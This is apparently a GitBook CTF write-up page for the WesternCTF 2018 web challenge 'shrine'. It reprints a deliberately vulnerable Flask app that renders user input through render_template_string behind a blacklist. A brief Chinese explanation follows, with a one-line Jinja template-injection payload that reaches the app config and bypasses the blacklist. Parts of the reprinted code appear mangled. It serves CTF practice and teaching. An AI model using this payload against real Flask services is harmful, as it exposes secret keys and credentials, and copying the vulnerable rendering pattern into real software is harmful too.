📕 WriteUp
  • Introduction
  • NewStarCTF 2023
  • MoeCTF 2023
  • DASCTF Jul.2023
  • LitCTF 2023
  • 蓝桥杯 2023
  • NSSRound#13
  • GDOUCTF 2023
  • MoeCTF 2022
  • SWPUCTF 2022
  • SWPUCTF 2021
  • MoeCTF 2021
  • NPUCTF 2020
  • MRCTF 2020
  • GYCTF 2020
  • BJDCTF 2020
  • 网鼎杯 2020
  • CISCN 2019
  • 极客大挑战 2019
  • 安洵杯 2019
  • 强网杯 2019
  • SUCTF 2019
  • De1CTF 2019
  • SWPUCTF 2019
  • ZJCTF 2019
  • RoarCTF 2019
  • GWCTF 2019
  • GXYCTF 2019
  • WesternCTF 2018
  • HCTF 2018
  • 护网杯 2018
  • 网鼎杯 2018
  • BUUCTF 2018
Powered by GitBook
On this page
  • Web
  • shrine

WesternCTF 2018

Web

shrine

import flask import os 

app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 

@app.route('/')
def index(): 
    return open(__file__).read()

@app.route('/shrine/')
def shrine(shrine): 
    def safe_jinja(s): 
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{<div data-gb-custom-block data-tag="set"></div>}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': 
    app.run(debug=True)

通过分析代码可以得知 flag 在 config 里面,但是 config 和 self 都被列入了黑名单,所以需要通过其他方式来获取全局变量,Payload 如下

{{url_for.__globals__['current_app'].config}}
PreviousGXYCTF 2019NextHCTF 2018

Last updated 1 year ago